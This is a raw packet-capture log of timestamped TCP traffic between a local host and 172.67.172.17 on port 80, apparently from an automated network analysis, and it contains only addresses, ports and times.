Feb 23, 2021 15:30:33.669857025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669879913 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669897079 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669903994 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669928074 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669951916 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669961929 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669975996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669996023 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670001030 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670027971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670047998 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670054913 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670103073 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670650959 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670680046 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670707941 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670722961 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670732975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670757055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670782089 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670789003 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670806885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670830965 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670834064 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670855045 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670872927 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670878887 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670907021 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670918941 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670931101 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670954943 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.670969009 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.670979977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671004057 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671029091 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671030998 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.671072006 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.671547890 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671577930 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671602964 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671633959 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.671654940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671705961 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.671806097 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671849012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671865940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671883106 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671892881 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.671900034 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671916008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671928883 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.671931982 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671950102 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671966076 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.671968937 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.671988010 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672003031 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672003984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672022104 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672033072 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672066927 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672534943 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672564030 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672580004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672595978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672611952 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672625065 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672630072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672650099 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672657967 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672669888 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672686100 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672687054 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672703981 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672715902 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672720909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672736883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672751904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672753096 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672770977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672780037 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672791004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672808886 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.672815084 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.672852039 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.673502922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673528910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673546076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673563004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673578978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673589945 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.673599005 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673618078 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.673618078 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673635960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673644066 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.673654079 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673671961 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673675060 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.673688889 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673706055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673721075 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673739910 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.673741102 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673760891 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673775911 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.673820019 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.674582958 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674609900 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674627066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674644947 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674658060 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.674664021 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674681902 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674690962 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.674699068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674715996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674722910 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.674732924 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674752951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674767017 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.674771070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674788952 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674798012 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.674808025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674823999 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674835920 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.674839973 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674858093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.674875021 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.674977064 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.675371885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675399065 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675419092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675451994 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.675494909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675513983 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675533056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675595999 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.675611019 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.675611973 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675633907 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675651073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675668001 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675684929 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675698042 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.675702095 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675720930 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675731897 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.675741911 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675760984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675760984 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.675777912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.675789118 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.675837040 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.676377058 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676399946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676414967 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676434994 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676441908 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.676454067 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676471949 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676487923 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676503897 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676511049 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.676523924 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676537037 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.676542997 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676559925 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676568985 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.676578045 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676594019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676594019 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.676610947 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676619053 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.676629066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676645041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.676657915 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.676696062 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.677280903 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677308083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677326918 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677345037 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677351952 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.677362919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677380085 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677407026 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.677428961 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.677431107 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677452087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677469015 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677485943 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677494049 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.677503109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677520990 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677527905 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.677537918 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677557945 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677561998 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.677577019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677593946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.677604914 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.677635908 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.678328037 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678350925 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678366899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678384066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678392887 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.678400040 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678417921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678425074 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.678435087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678459883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678472042 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.678479910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678497076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678507090 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.678517103 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678530931 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.678536892 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678554058 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678570986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678582907 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.678587914 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678606033 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.678606033 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.678668976 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.679202080 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679225922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679245949 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679265976 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679286003 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679290056 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.679303885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679308891 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.679322958 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679339886 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679353952 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.679358006 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679374933 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679383993 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.679394007 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679461002 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.679471970 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.679512024 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.737379074 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737477064 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737554073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737556934 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.737585068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737611055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737637043 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737654924 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.737667084 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737694979 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737695932 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.737745047 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.737773895 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737802982 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737832069 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737852097 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.737876892 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737915039 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.737945080 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.737957954 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738013983 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738015890 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738049984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738065958 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738084078 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738102913 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738111019 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738122940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738143921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738152027 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738163948 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738181114 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738183022 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738198042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738213062 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738229036 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738236904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738246918 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738275051 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738286972 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738300085 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738317966 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738320112 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738336086 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738357067 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738374949 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738392115 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738410950 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738434076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738444090 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738454103 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738475084 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738475084 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738497019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738523960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738543987 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738547087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738570929 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738591909 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738595963 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738619089 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738622904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738643885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738670111 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738817930 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738837004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738854885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738867998 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738874912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738894939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738912106 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738913059 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738930941 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738950014 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738957882 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.738970041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.738987923 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739003897 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739005089 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.739026070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739044905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739061117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739077091 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739085913 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.739095926 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739109039 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.739113092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739131927 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739146948 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.739147902 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739168882 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739176989 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.739219904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.739464998 CET	49737	80	192.168.2.4	172.67.172.17
